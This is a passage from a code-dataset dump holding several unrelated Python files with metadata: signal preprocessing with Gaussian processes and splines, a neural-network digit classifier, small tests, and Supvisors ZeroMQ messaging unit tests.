"gensim.models.KeyedVectors.load", "line_number": 25, "usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "573524816", "text": "from sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import (\n RBF,\n Matern,\n RationalQuadratic,\n ExpSineSquared,\n DotProduct,\n ConstantKernel,\n WhiteKernel,\n)\nimport numpy as np\nfrom scipy.interpolate import CubicSpline\nfrom collections import defaultdict\n\n\nclass BatchSignalPreprocessor(object):\n def __init__(self, t, data, method):\n self.prepocessors = defaultdict()\n if method == \"SplineSignalPreprocessor\":\n for key, datum in data.items():\n self.prepocessors[key] = SplineSignalPreprocessor(t, datum)\n\n def interpolate(self, t_new):\n ret_data = defaultdict()\n for key, preprocessor in self.prepocessors.items():\n ret_data[key] = preprocessor.interpolate(t_new)\n return ret_data\n\n def calculate_time_derivative(self, t_new):\n ret_data = defaultdict()\n for key, preprocessor in self.prepocessors.items():\n ret_data[key] = preprocessor.calculate_time_derivative(t_new)\n return ret_data\n\n\nclass SignalPreprocessor(object):\n def __init__(self, t, y):\n self._dydt = None\n self.y = y\n self.t = t\n\n @property\n def dydt(self):\n # TODO add checks\n return self._dydt\n\n @dydt.setter\n def dydt(self, new_value):\n raise ValueError(\n \"dydt cannot be changed from the outside of the object!\"\n )\n\n\nclass GPSignalPreprocessor(SignalPreprocessor):\n def __init__(self, t, y, selected_kernel=\"RBF\"):\n 
super().__init__(t, y)\n self.kernels = None\n self.selected_kernel = selected_kernel\n\n # Create different kernels that will be explored\n self.kernels = dict()\n\n self.kernels[\"RBF\"] = 1.0 * RBF(\n length_scale=0.5, length_scale_bounds=(1e-1, 100.0)\n )\n self.kernels[\"RatQuad\"] = 1.0 * RationalQuadratic(\n length_scale=1.0, alpha=0.2\n )\n self.kernels[\"ExpSineSquared\"] = 1.0 * ExpSineSquared(\n length_scale=1.0,\n periodicity=3,\n length_scale_bounds=(0.1, 10.0),\n periodicity_bounds=(1.0, 10.0),\n )\n self.kernels[\"Matern\"] = 1.0 * Matern(\n length_scale=1.0, length_scale_bounds=(1e-1, 100.0), nu=1.5\n )\n\n if selected_kernel not in self.kernels.keys():\n raise KeyError(\n f\"Unknown kernel: {selected_kernel}, available kernels: {self.kernels.keys()}\"\n )\n\n # Generate the noisy kernels\n self.noisy_kernels = dict()\n for key, kernel in self.kernels.items():\n self.noisy_kernels[key] = kernel + WhiteKernel(\n noise_level=1, noise_level_bounds=(1e-3, 1e3)\n )\n\n def interpolate(self):\n # Adjust the number of samples to be drawn from the fitted GP\n gp_samples = 1\n\n actual_kernel = self.noisy_kernels[self.selected_kernel]\n gp = GaussianProcessRegressor(kernel=actual_kernel)\n\n X = self.t[:, np.newaxis]\n gp.fit(X, self.y)\n\n self.A_mean, A_std = gp.predict(X, return_std=True)\n _, self.K_A = gp.predict(X, return_cov=True)\n y_samples = gp.sample_y(X, gp_samples)\n\n return y_samples\n\n def calculate_time_derivative(self):\n dA_mean = np.diff(self.A_mean)\n dTime = np.diff(self.t)\n dTime = np.append(dTime, [dTime[-1]])\n dA_mean = np.append(dA_mean, [dA_mean[-1]]) / dTime\n\n self._dydt = dA_mean\n\n def diff_matrix(self, size):\n \"\"\"Differentiation matrix -- used as a linear operator\"\"\"\n A = np.zeros((size, size))\n b = np.ones(size - 1)\n np.fill_diagonal(A[0:], -b)\n np.fill_diagonal(A[:, 1:], b)\n return A\n\n\nclass SplineSignalPreprocessor(SignalPreprocessor):\n def __init__(self, t, y):\n super().__init__(t, y)\n self.cs = None\n\n def interpolate(self, t_new):\n self.cs = CubicSpline(self.t, self.y)\n\n return self.cs(t_new)\n\n def calculate_time_derivative(self, t_new):\n if self.cs is None:\n self.interpolate(t_new=t_new)\n\n pp = self.cs.derivative()\n return pp(t_new)\n\n\nclass RHSEvalSignalPreprocessor(SignalPreprocessor):\n def __init__(self, t, y, rhs_function, states):\n super().__init__(t, y)\n self.rhs_function = rhs_function\n self.states = states\n\n def interpolate(self):\n pass\n\n def calculate_time_derivative(self):\n rr = list()\n for yy in self.y.T:\n rr.append(self.rhs_function(0, yy, self.states))\n\n self._dydt = np.array(rr).T\n\n\nclass ZeroOrderHoldPreprocessor(SignalPreprocessor):\n def __init__(self, t, y):\n super(ZeroOrderHoldPreprocessor, self).__init__(t=t, y=y)\n\n def calculate_time_derivative(self):\n raise NotImplementedError(\n \"Time derivative calculation is not implemented for Zero order hold!\"\n )\n\n def interpolate(self, t_new):\n # TODO ZAT support non pandas data format too!\n ret = []\n if isinstance(t_new, float):\n return self.y[abs(self.t - t_new).idxmin()]\n\n for t_i in t_new:\n ret.append(self.y[abs(self.t - t_i).idxmin()])\n return ret\n", "sub_path": "Docker-Django/app/env/lib/python3.8/site-packages/ode_composer/signal_preprocessor.py", "file_name": "signal_preprocessor.py", "file_ext": "py", "file_size_in_byte": 5254, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "collections.defaultdict", "line_number": 18, 
"usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 24, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.gaussian_process.kernels.RBF", "line_number": 63, "usage_type": "call"}, {"api_name": "sklearn.gaussian_process.kernels.RationalQuadratic", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.gaussian_process.kernels.ExpSineSquared", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.gaussian_process.kernels.Matern", "line_number": 75, "usage_type": "call"}, {"api_name": "sklearn.gaussian_process.kernels.WhiteKernel", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.gaussian_process.GaussianProcessRegressor", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 98, "usage_type": "attribute"}, {"api_name": "numpy.diff", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 120, "usage_type": "call"}, {"api_name": "scipy.interpolate.CubicSpline", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 156, "usage_type": "call"}]} +{"seq_id": "101966709", "text": "# import\n## batteries\nimport os\nimport sys\nimport pytest\n## 3rd party\nimport numpy as np\n## package\nfrom DeepMAsED.Commands import Predict as Predict_CMD\n\n# test/data dir\ntest_dir = os.path.join(os.path.dirname(__file__))\ndata_dir = os.path.join(test_dir, 'data')\n\n\ndef test_help():\n args = ['-h']\n with pytest.raises(SystemExit) as pytest_wrapped_e:\n Predict_CMD.parse_args(args)\n assert pytest_wrapped_e.type == SystemExit\n assert pytest_wrapped_e.value.code == 0\n\ndef test_predict(tmp_path):\n indir = os.path.join(data_dir, 'deepmased_trained')\n outdir = os.path.join(tmp_path, 'predict_cpu')\n args = ['--cpu_only', '--data_path', indir, '--save_path', outdir]\n args = Predict_CMD.parse_args(args)\n Predict_CMD.main(args)\n F = os.path.join(outdir,'predictions', 'deepmased_trained', 'predictions.csv')\n assert os.path.isfile(F)\n \n", "sub_path": "tests/test_Predict.py", "file_name": "test_Predict.py", "file_ext": "py", "file_size_in_byte": 876, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 18, "usage_type": "call"}, {"api_name": "DeepMAsED.Commands.Predict.parse_args", "line_number": 19, "usage_type": "call"}, {"api_name": "DeepMAsED.Commands.Predict", "line_number": 19, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "DeepMAsED.Commands.Predict.parse_args", "line_number": 27, "usage_type": "call"}, {"api_name": "DeepMAsED.Commands.Predict", "line_number": 27, "usage_type": "name"}, {"api_name": "DeepMAsED.Commands.Predict.main", "line_number": 28, "usage_type": "call"}, {"api_name": "DeepMAsED.Commands.Predict", "line_number": 28, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}]} +{"seq_id": "145996662", "text": "from NN_core import *\n\nimport scipy.optimize as opt\n\n\n# constants\ninput_layer_size = 400 # 20x20 Input Images of Digits\nhidden_layer_size = 25 # 25 hidden units\nnum_labels = 10 # 10 labels, from 1 to 10\n\n# load image data\ndigit_data = np.genfromtxt('data/digit_data_X.csv', delimiter=',', dtype='float')\ndigit_data_y = np.genfromtxt('data/digit_data_y.csv', delimiter=',', dtype='float')\n\n# load nn parameters theta:\n#theta1 = np.genfromtxt('data/Theta1_test.csv', delimiter=',', dtype='float')\n#theta2 = np.genfromtxt('data/Theta2_test.csv', delimiter=',', dtype='float')\n\n\n## Train the NN useing fmin_cg from scipy.optimization\n\nprint('Training Neural Network ...')\ninitial_Theta1 = random_initialize_weights(input_layer_size, hidden_layer_size)\ninitial_Theta2 = random_initialize_weights(hidden_layer_size, num_labels)\np = predict(initial_Theta1, initial_Theta2, digit_data)\nacc = np.mean(((p+1) == digit_data_y))*100 # prediction accuracy\nprint('Training Set Accuracy BEFORE training is ' + str(acc) + '%')\n\ninitial_nn_params = np.vstack((initial_Theta1.ravel().reshape(initial_Theta1.size, 1), initial_Theta2.ravel().reshape(initial_Theta2.size, 1)))\nlambda_ = 1 # regularization\ncostFunc = lambda p: cost_J_only(p, input_layer_size, hidden_layer_size, num_labels, digit_data, digit_data_y, lambda_)\ngradFunc = lambda p: cost_grad_only(p, input_layer_size, hidden_layer_size, num_labels, digit_data, digit_data_y, lambda_)\n\nnn_params = opt.fmin_cg(costFunc, initial_nn_params, fprime=gradFunc, maxiter=50)\nTheta1 = nn_params[:hidden_layer_size * (input_layer_size + 1)].reshape(hidden_layer_size, input_layer_size + 1)\nTheta2 = nn_params[(hidden_layer_size * (input_layer_size + 1)):].reshape(num_labels, (hidden_layer_size + 1))\np = predict(Theta1, Theta2, digit_data)\nacc = np.mean(((p+1) == digit_data_y))*100 # prediction accuracy\nprint('Training Set Accuracy AFTER TRAINING is ' + str(acc) + '%')\ninput(\"Press Enter to continue...\")\n\n# prediction demo\nm = digit_data.shape[0]\nm_perm = np.random.permutation(m)\nfor i in m_perm[0:10]:\n plt.imshow(digit_data[m_perm[i], :].reshape(20, 20), cmap='gray')\n plt.ion()\n plt.show()\n plt.pause(0.001)\n p = predict(Theta1, Theta2, (digit_data[m_perm[i], :]))\n print('Neural Network Prediction: ' + str(np.mod(p + 1, 10)))\n input(\"Press Enter to continue...\")\n", "sub_path": "NN_digits_learn.py", "file_name": "NN_digits_learn.py", "file_ext": "py", "file_size_in_byte": 2336, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "scipy.optimize.fmin_cg", "line_number": 34, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "128422465", "text": 
"from book import Book\nfrom recipe import Recipe\nimport datetime\n\n\nsalad = Recipe(\"salad\", 1, 10, [\"tomatoes\", \"lettuce\", \"mozza\"], \"simple salad\", \"starter\")\nsandwich = Recipe(\"sandwich\", 1, 5, [\"bread\", \"ham\", \"tomatoes\", \"olive oil\"], \"easy sandwich\", \"lunch\")\nmelon = Recipe(\"melon with jam\", 2, 10, [\"melon\", \"ham (jamon)\"], \"typical slices of melon with ham\", \"starter\")\n\n#to_print = str(salad)\n#print(to_print)\n\nrecipes_list = {\n\t'starter' : [],\n\t'lunch' : [],\n\t'dessert' : [],\n}\n\ncookbook = Book(\"cookbook\", datetime.datetime.now(), datetime.date.today(), recipes_list)\ncookbook.add_recipe(salad)\ncookbook.add_recipe(melon)\ncookbook.add_recipe(sandwich)\nx = 1\ncookbook.add_recipe(x)\ncookbook.get_recipe_by_name('melon with jam')\n#cookbook.get_recipes_by_type('starter')\nprint(cookbook.last_update)\n", "sub_path": "day01/ex00/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 805, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "recipe.Recipe", "line_number": 6, "usage_type": "call"}, {"api_name": "recipe.Recipe", "line_number": 7, "usage_type": "call"}, {"api_name": "recipe.Recipe", "line_number": 8, "usage_type": "call"}, {"api_name": "book.Book", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 19, "usage_type": "attribute"}]} +{"seq_id": "432867692", "text": "#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\n# ======================================================================\n# Copyright 2017 Julien LE CLEACH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ======================================================================\n\nimport os\nimport sys\nimport time\nimport unittest\nimport zmq\n\nfrom supvisors.tests.base import MockedSupvisors\n\n\nclass ZmqSocketTest(unittest.TestCase):\n \"\"\" Test case for the ZeroMQ sockets created in the supvisorszmq module. \"\"\"\n\n def setUp(self):\n \"\"\" Create a dummy supvisors and a ZMQ context. \"\"\"\n # the dummy Supvisors is used for addresses and ports\n self.supvisors = MockedSupvisors()\n # create the ZeroMQ context\n self.zmq_context = zmq.Context.instance()\n\n def test_internal_publish_subscribe(self):\n \"\"\" Test the ZeroMQ publish-subscribe sockets used internally\n in Supvisors. 
\"\"\"\n from supvisors.supvisorszmq import (InternalEventPublisher,\n InternalEventSubscriber)\n # create publisher and subscriber\n publisher = InternalEventPublisher(\n self.supvisors.address_mapper.local_address,\n self.supvisors.options.internal_port,\n self.supvisors.logger)\n subscriber = InternalEventSubscriber(\n self.supvisors.address_mapper.addresses,\n self.supvisors.options.internal_port)\n # check that the ZMQ sockets are ready\n self.assertFalse(publisher.socket.closed)\n self.assertFalse(subscriber.socket.closed)\n # close the sockets\n publisher.close()\n subscriber.close()\n # check that the ZMQ socket are closed\n self.assertTrue(publisher.socket.closed)\n self.assertTrue(subscriber.socket.closed)\n\n def test_external_publish_subscribe(self):\n \"\"\" Test the ZeroMQ publish-subscribe sockets used in the event\n interface of Supvisors. \"\"\"\n from supvisors.supvisorszmq import EventPublisher, EventSubscriber\n # get event port\n port = self.supvisors.options.event_port\n # create publisher and subscriber\n publisher = EventPublisher(port, self.supvisors.logger)\n subscriber = EventSubscriber(zmq.Context.instance(), port,\n self.supvisors.logger)\n # check that the ZMQ sockets are ready\n self.assertFalse(publisher.socket.closed)\n self.assertFalse(subscriber.socket.closed)\n # close the sockets\n publisher.close()\n subscriber.close()\n # check that the ZMQ socket are closed\n self.assertTrue(publisher.socket.closed)\n self.assertTrue(subscriber.socket.closed)\n\n def test_internal_pusher_puller(self):\n \"\"\" Test the ZeroMQ push-pull sockets used internally in Supvisors. \"\"\"\n from supvisors.supvisorszmq import RequestPusher, RequestPuller\n # create publisher and subscriber\n pusher = RequestPusher(self.supvisors.logger)\n puller = RequestPuller()\n # check that the ZMQ sockets are ready\n self.assertFalse(pusher.socket.closed)\n self.assertFalse(puller.socket.closed)\n # close the sockets\n pusher.close()\n puller.close()\n # check that the ZMQ socket are closed\n self.assertTrue(pusher.socket.closed)\n self.assertTrue(puller.socket.closed)\n\n\nclass InternalEventTest(unittest.TestCase):\n \"\"\" Test case for the InternalEventPublisher and InternalEventSubscriber\n classes of the supvisorszmq module. \"\"\"\n\n def setUp(self):\n \"\"\" Create a dummy supvisors, ZMQ context and sockets. \"\"\"\n from supvisors.supvisorszmq import (InternalEventPublisher,\n InternalEventSubscriber)\n # the dummy Supvisors is used for addresses and ports\n self.supvisors = MockedSupvisors()\n # create publisher and subscriber\n self.publisher = InternalEventPublisher(\n self.supvisors.address_mapper.local_address,\n self.supvisors.options.internal_port,\n self.supvisors.logger)\n self.subscriber = InternalEventSubscriber(\n self.supvisors.address_mapper.addresses,\n self.supvisors.options.internal_port)\n # socket configuration is meant to be blocking\n # however, a failure would block the unit test,\n # so a timeout is set for reception\n self.subscriber.socket.setsockopt(zmq.RCVTIMEO, 1000)\n # publisher does not wait for subscriber clients to work,\n # so give some time for connections\n time.sleep(1)\n\n def tearDown(self):\n \"\"\" Destroy the ZMQ context. \"\"\"\n # close the ZeroMQ sockets\n self.publisher.close()\n self.subscriber.close()\n\n def receive(self, event_type):\n \"\"\" This method performs a checked reception on the subscriber. 
\"\"\"\n try:\n self.subscriber.socket.poll(1000)\n return self.subscriber.receive()\n except zmq.Again:\n self.fail('Failed to get {} event'.format(event_type))\n\n def test_disconnection(self):\n \"\"\" Test the disconnection of subscribers. \"\"\"\n from supvisors.utils import InternalEventHeaders\n # get the local address\n local_address = self.supvisors.address_mapper.local_address\n # test remote disconnection\n address = next(address\n for address in self.supvisors.address_mapper.addresses\n if address != local_address)\n self.subscriber.disconnect([address])\n # send a tick event from the local publisher\n payload = {'date': 1000}\n self.publisher.send_tick_event(payload)\n # check the reception of the tick event\n msg = self.receive('Tick')\n self.assertTupleEqual((InternalEventHeaders.TICK,\n local_address, payload), msg)\n # test local disconnection\n self.subscriber.disconnect([local_address])\n # send a tick event from the local publisher\n self.publisher.send_tick_event(payload)\n # check the non-reception of the tick event\n with self.assertRaises(zmq.Again):\n self.subscriber.receive()\n\n def test_tick_event(self):\n \"\"\" Test the publication and subscription of the messages. \"\"\"\n from supvisors.utils import InternalEventHeaders\n # get the local address\n local_address = self.supvisors.address_mapper.local_address\n # send a tick event\n payload = {'date': 1000}\n self.publisher.send_tick_event(payload)\n # check the reception of the tick event\n msg = self.receive('Tick')\n self.assertTupleEqual((InternalEventHeaders.TICK,\n local_address, payload), msg)\n\n def test_process_event(self):\n \"\"\" Test the publication and subscription of the process events. \"\"\"\n from supvisors.utils import InternalEventHeaders\n # get the local address\n local_address = self.supvisors.address_mapper.local_address\n # send a process event\n payload = {'name': 'dummy_program', 'state': 'running'}\n self.publisher.send_process_event(payload)\n # check the reception of the process event\n msg = self.receive('Process')\n self.assertTupleEqual((InternalEventHeaders.PROCESS,\n local_address, payload), msg)\n\n def test_statistics(self):\n \"\"\" Test the publication and subscription of the statistics messages. \"\"\"\n from supvisors.utils import InternalEventHeaders\n # get the local address\n local_address = self.supvisors.address_mapper.local_address\n # send a statistics event\n payload = {'cpu': 15, 'mem': 5, 'io': (1234, 4321)}\n self.publisher.send_statistics(payload)\n # check the reception of the statistics event\n msg = self.receive('Statistics')\n self.assertTupleEqual((InternalEventHeaders.STATISTICS,\n local_address, payload), msg)\n\n\nclass RequestTest(unittest.TestCase):\n \"\"\" Test case for the InternalEventPublisher and InternalEventSubscriber\n classes of the supvisorszmq module. \"\"\"\n\n def setUp(self):\n \"\"\" Create a dummy supvisors, ZMQ context and sockets. \"\"\"\n from supvisors.supvisorszmq import RequestPusher, RequestPuller\n # the dummy Supvisors is used for addresses and ports\n self.supvisors = MockedSupvisors()\n # create pusher and puller\n self.pusher = RequestPusher(self.supvisors.logger)\n self.puller = RequestPuller()\n # socket configuration is meant to be blocking\n # however, a failure would block the unit test,\n # so a timeout is set for emission and reception\n self.puller.socket.setsockopt(zmq.SNDTIMEO, 1000)\n self.puller.socket.setsockopt(zmq.RCVTIMEO, 1000)\n\n def tearDown(self):\n \"\"\" Destroy the ZMQ context. 
\"\"\"\n # close the ZeroMQ sockets\n self.pusher.close()\n self.puller.close()\n\n def receive(self, event_type):\n \"\"\" This method performs a checked reception on the puller. \"\"\"\n try:\n return self.puller.receive()\n except zmq.Again:\n self.fail('Failed to get {} request'. format(event_type))\n\n def test_check_address(self):\n \"\"\" The method tests that the 'Check Address' request is sent\n and received correctly. \"\"\"\n from supvisors.utils import DeferredRequestHeaders\n self.pusher.send_check_address('10.0.0.1')\n request = self.receive('Check Address')\n self.assertTupleEqual((DeferredRequestHeaders.CHECK_ADDRESS,\n ('10.0.0.1', )), request)\n # test that absence of puller does not block the pusher\n # or raise any exception\n self.puller.close()\n try:\n self.pusher.send_check_address('10.0.0.1')\n except:\n self.fail('unexpected exception')\n\n def test_isolate_addresses(self):\n \"\"\" The method tests that the 'Isolate Addresses' request is sent\n and received correctly. \"\"\"\n from supvisors.utils import DeferredRequestHeaders\n self.pusher.send_isolate_addresses(['10.0.0.1', '10.0.0.2'])\n request = self.receive('Isolate Addresses')\n self.assertTupleEqual((DeferredRequestHeaders.ISOLATE_ADDRESSES,\n (['10.0.0.1', '10.0.0.2'])), request)\n # test that absence of puller does not block the pusher\n # or raise any exception\n self.puller.close()\n try:\n self.pusher.send_isolate_addresses(['10.0.0.1', '10.0.0.2'])\n except:\n self.fail('unexpected exception')\n\n def test_start_process(self):\n \"\"\" The method tests that the 'Start Process' request is sent\n and received correctly. \"\"\"\n from supvisors.utils import DeferredRequestHeaders\n self.pusher.send_start_process('10.0.0.1', 'application:program',\n ['-extra', 'arguments'])\n request = self.receive('Start Process')\n self.assertTupleEqual(\n (DeferredRequestHeaders.START_PROCESS,\n ('10.0.0.1', 'application:program', ['-extra', 'arguments'])),\n request)\n # test that absence of puller does not block the pusher\n # or raise any exception\n self.puller.close()\n try:\n self.pusher.send_start_process('10.0.0.1', 'application:program',\n ['-extra', 'arguments'])\n except:\n self.fail('unexpected exception')\n\n def test_stop_process(self):\n \"\"\" The method tests that the 'Stop Process' request is sent\n and received correctly. \"\"\"\n from supvisors.utils import DeferredRequestHeaders\n self.pusher.send_stop_process('10.0.0.1', 'application:program')\n request = self.receive('Stop Process')\n self.assertTupleEqual((DeferredRequestHeaders.STOP_PROCESS,\n ('10.0.0.1', 'application:program')), request)\n # test that absence of puller does not block the pusher\n # or raise any exception\n self.puller.close()\n try:\n self.pusher.send_stop_process('10.0.0.1', 'application:program')\n except:\n self.fail('unexpected exception')\n\n def test_restart(self):\n \"\"\" The method tests that the 'Restart' request is sent\n and received correctly. \"\"\"\n from supvisors.utils import DeferredRequestHeaders\n self.pusher.send_restart('10.0.0.1')\n request = self.receive('Restart')\n self.assertTupleEqual((DeferredRequestHeaders.RESTART,\n ('10.0.0.1', )), request)\n # test that absence of puller does not block the pusher\n # or raise any exception\n self.puller.close()\n try:\n self.pusher.send_restart('10.0.0.1')\n except:\n self.fail('unexpected exception')\n\n def test_shutdown(self):\n \"\"\" The method tests that the 'Shutdown' request is sent\n and received correctly. 
\"\"\"\n from supvisors.utils import DeferredRequestHeaders\n self.pusher.send_shutdown('10.0.0.1')\n request = self.receive('Shutdown')\n self.assertTupleEqual((DeferredRequestHeaders.SHUTDOWN,\n ('10.0.0.1', )), request)\n # test that absence of puller does not block the pusher\n # or raise any exception\n self.puller.close()\n try:\n self.pusher.send_shutdown('10.0.0.1')\n except:\n self.fail('unexpected exception')\n\n\nclass Payload:\n \"\"\" Dummy class just implementing a serial method. \"\"\"\n def __init__(self, data):\n self.data = data\n def copy(self):\n return self.data.copy()\n def serial(self):\n return self.data\n\n\nclass EventTest(unittest.TestCase):\n \"\"\" Test case for the EventPublisher and EventSubscriber classes\n of the supvisorszmq module. \"\"\"\n\n def setUp(self):\n \"\"\" Create a dummy supvisors and a ZMQ context. \"\"\"\n from supvisors.supvisorszmq import EventPublisher, EventSubscriber\n # the dummy Supvisors is used for addresses and ports\n self.supvisors = MockedSupvisors()\n # create the ZeroMQ context\n # create publisher and subscriber\n self.publisher = EventPublisher(\n self.supvisors.options.event_port,\n self.supvisors.logger)\n self.subscriber = EventSubscriber(\n zmq.Context.instance(),\n self.supvisors.options.event_port,\n self.supvisors.logger)\n # WARN: this subscriber does not include a subscription\n # when using a subscription, use a time sleep to give time\n # to PyZMQ to handle it\n # WARN: socket configuration is meant to be blocking\n # however, a failure would block the unit test,\n # so a timeout is set for reception\n self.subscriber.socket.setsockopt(zmq.RCVTIMEO, 1000)\n # create test payloads\n self.supvisors_payload = Payload({'state': 'running',\n 'version': '1.0'})\n self.address_payload = Payload({'state': 'silent',\n 'name': 'cliche01',\n 'date': 1234})\n self.application_payload = Payload({'state': 'starting',\n 'name': 'supvisors'})\n self.process_payload = Payload({'state': 'running',\n 'process_name': 'plugin',\n 'application_name': 'supvisors',\n 'date': 1230})\n self.event_payload = Payload({'state': 20,\n 'name': 'plugin',\n 'group': 'supvisors',\n 'now': 1230})\n\n def tearDown(self):\n \"\"\" Close the sockets. \"\"\"\n self.publisher.close()\n self.subscriber.close()\n\n def check_reception(self, header=None, data=None):\n \"\"\" The method tests that the message is received correctly\n or not received at all. \"\"\"\n if header and data:\n # check that subscriber receives the message\n try:\n msg = self.subscriber.receive()\n except zmq.Again:\n self.fail('Failed to get {} status'.format(header))\n self.assertTupleEqual((header, data), msg)\n else:\n # check the non-reception of the Supvisors status\n with self.assertRaises(zmq.Again):\n self.subscriber.receive()\n\n def check_supvisors_status(self, subscribed):\n \"\"\" The method tests the emission and reception of a Supvisors status,\n depending on the subscription status. \"\"\"\n from supvisors.utils import EventHeaders\n self.publisher.send_supvisors_status(self.supvisors_payload)\n if subscribed:\n self.check_reception(EventHeaders.SUPVISORS,\n self.supvisors_payload.data)\n else:\n self.check_reception()\n\n def check_address_status(self, subscribed):\n \"\"\" The method tests the emission and reception of an Address status,\n depending on the subscription status. 
\"\"\"\n from supvisors.utils import EventHeaders\n self.publisher.send_address_status(self.address_payload)\n if subscribed:\n self.check_reception(EventHeaders.ADDRESS,\n self.address_payload.data)\n else:\n self.check_reception()\n\n def check_application_status(self, subscribed):\n \"\"\" The method tests the emission and reception of an Application\n status, depending on the subscription status. \"\"\"\n from supvisors.utils import EventHeaders\n self.publisher.send_application_status(self.application_payload)\n if subscribed:\n self.check_reception(EventHeaders.APPLICATION,\n self.application_payload.data)\n else:\n self.check_reception()\n\n def check_process_event(self, subscribed):\n \"\"\" The method tests the emission and reception of a Process status,\n depending on the subscription status. \"\"\"\n from supvisors.utils import EventHeaders\n self.publisher.send_process_event('local_address', self.event_payload)\n if subscribed:\n expected = self.event_payload.data\n expected['address'] = 'local_address'\n self.check_reception(EventHeaders.PROCESS_EVENT, expected)\n else:\n self.check_reception()\n\n def check_process_status(self, subscribed):\n \"\"\" The method tests the emission and reception of a Process status,\n depending on the subscription status. \"\"\"\n from supvisors.utils import EventHeaders\n self.publisher.send_process_status(self.process_payload)\n if subscribed:\n self.check_reception(EventHeaders.PROCESS_STATUS,\n self.process_payload.data)\n else:\n self.check_reception()\n\n def check_subscription(self, supvisors_subscribed, address_subscribed,\n application_subscribed, event_subscribed, process_subscribed):\n \"\"\" The method tests the emission and reception of all status,\n depending on their subscription status. \"\"\"\n time.sleep(1)\n self.check_supvisors_status(supvisors_subscribed)\n self.check_address_status(address_subscribed)\n self.check_application_status(application_subscribed)\n self.check_process_event(event_subscribed)\n self.check_process_status(process_subscribed)\n\n def test_no_subscription(self):\n \"\"\" Test the non-reception of messages when subscription is not set. \"\"\"\n # at this stage, no subscription has been set\n # so nothing should be received\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_supvisors_status(self):\n \"\"\" Test the reception of Supvisors status messages\n when related subscription is set. \"\"\"\n # subscribe to Supvisors status only\n self.subscriber.subscribe_supvisors_status()\n self.check_subscription(True, False, False, False, False)\n # unsubscribe from Supvisors status\n self.subscriber.unsubscribe_supvisors_status()\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_address_status(self):\n \"\"\" Test the reception of Address status messages\n when related subscription is set. \"\"\"\n # subscribe to Address status only\n self.subscriber.subscribe_address_status()\n self.check_subscription(False, True, False, False, False)\n # unsubscribe from Address status\n self.subscriber.unsubscribe_address_status()\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_application_status(self):\n \"\"\" Test the reception of Application status messages\n when related subscription is set. 
\"\"\"\n # subscribe to Application status only\n self.subscriber.subscribe_application_status()\n self.check_subscription(False, False, True, False, False)\n # unsubscribe from Application status\n self.subscriber.unsubscribe_application_status()\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_process_event(self):\n \"\"\" Test the reception of Process event messages\n when related subscription is set. \"\"\"\n # subscribe to Process event only\n self.subscriber.subscribe_process_event()\n self.check_subscription(False, False, False, True, False)\n # unsubscribe from Process event\n self.subscriber.unsubscribe_process_event()\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_process_status(self):\n \"\"\" Test the reception of Process status messages\n when related subscription is set. \"\"\"\n # subscribe to Process status only\n self.subscriber.subscribe_process_status()\n self.check_subscription(False, False, False, False, True)\n # unsubscribe from Process status\n 